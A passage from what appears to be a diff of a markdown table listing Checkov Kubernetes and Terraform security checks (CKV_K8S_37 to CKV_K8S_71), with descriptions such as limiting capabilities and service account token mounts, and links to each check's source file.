[MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | -| 2817 | CKV_K8S_37 | resource | PodTemplate | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | -| 2818 | CKV_K8S_37 | resource | ReplicaSet | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | -| 2819 | CKV_K8S_37 | resource | ReplicationController | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | -| 2820 | CKV_K8S_37 | resource | StatefulSet | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | -| 2821 | CKV_K8S_37 | resource | kubernetes_deployment | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | -| 2822 | CKV_K8S_37 | resource | kubernetes_deployment_v1 | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | -| 2823 | CKV_K8S_37 | resource | kubernetes_pod | Minimise the admission of containers with capabilities assigned | Terraform | 
[MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | -| 2824 | CKV_K8S_37 | resource | kubernetes_pod_v1 | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | -| 2825 | CKV_K8S_38 | resource | CronJob | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | -| 2826 | CKV_K8S_38 | resource | DaemonSet | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | -| 2827 | CKV_K8S_38 | resource | Deployment | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | -| 2828 | CKV_K8S_38 | resource | Job | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | -| 2829 | CKV_K8S_38 | resource | Pod | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | -| 2830 | CKV_K8S_38 | resource | ReplicaSet | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | 
[ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | -| 2831 | CKV_K8S_38 | resource | ReplicationController | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | -| 2832 | CKV_K8S_38 | resource | StatefulSet | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | -| 2833 | CKV_K8S_39 | resource | CronJob | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | -| 2834 | CKV_K8S_39 | resource | DaemonSet | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | -| 2835 | CKV_K8S_39 | resource | Deployment | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | -| 2836 | CKV_K8S_39 | resource | DeploymentConfig | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | -| 2837 | CKV_K8S_39 | resource | Job | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | 
[AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | -| 2838 | CKV_K8S_39 | resource | Pod | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | -| 2839 | CKV_K8S_39 | resource | PodTemplate | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | -| 2840 | CKV_K8S_39 | resource | ReplicaSet | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | -| 2841 | CKV_K8S_39 | resource | ReplicationController | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | -| 2842 | CKV_K8S_39 | resource | StatefulSet | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | -| 2843 | CKV_K8S_39 | resource | kubernetes_deployment | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | -| 2844 | CKV_K8S_39 | resource | kubernetes_deployment_v1 | Do not use the CAP_SYS_ADMIN linux capability | Terraform | 
[AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | -| 2845 | CKV_K8S_39 | resource | kubernetes_pod | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | -| 2846 | CKV_K8S_39 | resource | kubernetes_pod_v1 | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | -| 2847 | CKV_K8S_40 | resource | CronJob | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | -| 2848 | CKV_K8S_40 | resource | DaemonSet | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | -| 2849 | CKV_K8S_40 | resource | Deployment | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | -| 2850 | CKV_K8S_40 | resource | Job | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | -| 2851 | CKV_K8S_40 | resource | Pod | Containers should run as a high UID to avoid host conflict | Kubernetes | 
[RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | -| 2852 | CKV_K8S_40 | resource | ReplicaSet | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | -| 2853 | CKV_K8S_40 | resource | ReplicationController | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | -| 2854 | CKV_K8S_40 | resource | StatefulSet | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | -| 2855 | CKV_K8S_41 | resource | ServiceAccount | Ensure that default service accounts are not actively used | Kubernetes | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccount.py) | -| 2856 | CKV_K8S_41 | resource | kubernetes_service_account | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) | -| 2857 | CKV_K8S_41 | resource | kubernetes_service_account_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) | -| 2858 | CKV_K8S_42 | resource | ClusterRoleBinding | Ensure that default service accounts are not actively used | Kubernetes | 
[DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccountBinding.py) | -| 2859 | CKV_K8S_42 | resource | RoleBinding | Ensure that default service accounts are not actively used | Kubernetes | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccountBinding.py) | -| 2860 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | -| 2861 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | -| 2862 | CKV_K8S_42 | resource | kubernetes_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | -| 2863 | CKV_K8S_42 | resource | kubernetes_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | -| 2864 | CKV_K8S_43 | resource | CronJob | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2865 | CKV_K8S_43 | resource | DaemonSet | Image should use digest | Kubernetes | 
[ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2866 | CKV_K8S_43 | resource | Deployment | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2867 | CKV_K8S_43 | resource | DeploymentConfig | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2868 | CKV_K8S_43 | resource | Job | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2869 | CKV_K8S_43 | resource | Pod | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2870 | CKV_K8S_43 | resource | PodTemplate | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2871 | CKV_K8S_43 | resource | ReplicaSet | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2872 | CKV_K8S_43 | resource | ReplicationController | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2873 | CKV_K8S_43 | resource | StatefulSet | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | -| 2874 | CKV_K8S_43 | resource | kubernetes_deployment | Image should use digest | Terraform | 
[ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | -| 2875 | CKV_K8S_43 | resource | kubernetes_deployment_v1 | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | -| 2876 | CKV_K8S_43 | resource | kubernetes_pod | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | -| 2877 | CKV_K8S_43 | resource | kubernetes_pod_v1 | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | -| 2878 | CKV_K8S_44 | resource | Service | Ensure that the Tiller Service (Helm v2) is deleted | Kubernetes | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerService.py) | -| 2879 | CKV_K8S_44 | resource | kubernetes_service | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) | -| 2880 | CKV_K8S_44 | resource | kubernetes_service_v1 | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) | -| 2881 | CKV_K8S_45 | resource | CronJob | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2882 | CKV_K8S_45 | resource | DaemonSet | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | 
[TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2883 | CKV_K8S_45 | resource | Deployment | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2884 | CKV_K8S_45 | resource | DeploymentConfig | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2885 | CKV_K8S_45 | resource | Job | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2886 | CKV_K8S_45 | resource | Pod | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2887 | CKV_K8S_45 | resource | PodTemplate | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2888 | CKV_K8S_45 | resource | ReplicaSet | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2889 | CKV_K8S_45 | resource | ReplicationController | Ensure the Tiller Deployment (Helm V2) 
is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2890 | CKV_K8S_45 | resource | StatefulSet | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | -| 2891 | CKV_K8S_49 | resource | ClusterRole | Minimize wildcard use in Roles and ClusterRoles | Kubernetes | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/WildcardRoles.py) | -| 2892 | CKV_K8S_49 | resource | Role | Minimize wildcard use in Roles and ClusterRoles | Kubernetes | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/WildcardRoles.py) | -| 2893 | CKV_K8S_49 | resource | kubernetes_cluster_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | -| 2894 | CKV_K8S_49 | resource | kubernetes_cluster_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | -| 2895 | CKV_K8S_49 | resource | kubernetes_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | -| 2896 | CKV_K8S_49 | resource | kubernetes_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | -| 2897 | 
CKV_K8S_68 | resource | CronJob | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2898 | CKV_K8S_68 | resource | DaemonSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2899 | CKV_K8S_68 | resource | Deployment | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2900 | CKV_K8S_68 | resource | DeploymentConfig | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2901 | CKV_K8S_68 | resource | Job | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2902 | CKV_K8S_68 | resource | Pod | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2903 | CKV_K8S_68 | resource | PodTemplate | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2904 | CKV_K8S_68 | resource | ReplicaSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | 
[ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2905 | CKV_K8S_68 | resource | ReplicationController | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2906 | CKV_K8S_68 | resource | StatefulSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2907 | CKV_K8S_69 | resource | CronJob | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2908 | CKV_K8S_69 | resource | DaemonSet | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2909 | CKV_K8S_69 | resource | Deployment | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2910 | CKV_K8S_69 | resource | DeploymentConfig | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2911 | CKV_K8S_69 | resource | Job | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 
2912 | CKV_K8S_69 | resource | Pod | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2913 | CKV_K8S_69 | resource | PodTemplate | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2914 | CKV_K8S_69 | resource | ReplicaSet | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2915 | CKV_K8S_69 | resource | ReplicationController | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2916 | CKV_K8S_69 | resource | StatefulSet | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2917 | CKV_K8S_70 | resource | CronJob | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2918 | CKV_K8S_70 | resource | DaemonSet | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2919 | CKV_K8S_70 | resource | Deployment | Ensure that the --token-auth-file argument is not set | Kubernetes | 
[ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2920 | CKV_K8S_70 | resource | DeploymentConfig | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2921 | CKV_K8S_70 | resource | Job | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2922 | CKV_K8S_70 | resource | Pod | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2923 | CKV_K8S_70 | resource | PodTemplate | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2924 | CKV_K8S_70 | resource | ReplicaSet | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2925 | CKV_K8S_70 | resource | ReplicationController | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2926 | CKV_K8S_70 | resource | StatefulSet | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2927 | 
CKV_K8S_71 | resource | CronJob | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2928 | CKV_K8S_71 | resource | DaemonSet | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2929 | CKV_K8S_71 | resource | Deployment | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2930 | CKV_K8S_71 | resource | DeploymentConfig | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2931 | CKV_K8S_71 | resource | Job | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2932 | CKV_K8S_71 | resource | Pod | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2933 | CKV_K8S_71 | resource | PodTemplate | Ensure that the --kubelet-https argument is set to true | Kubernetes | 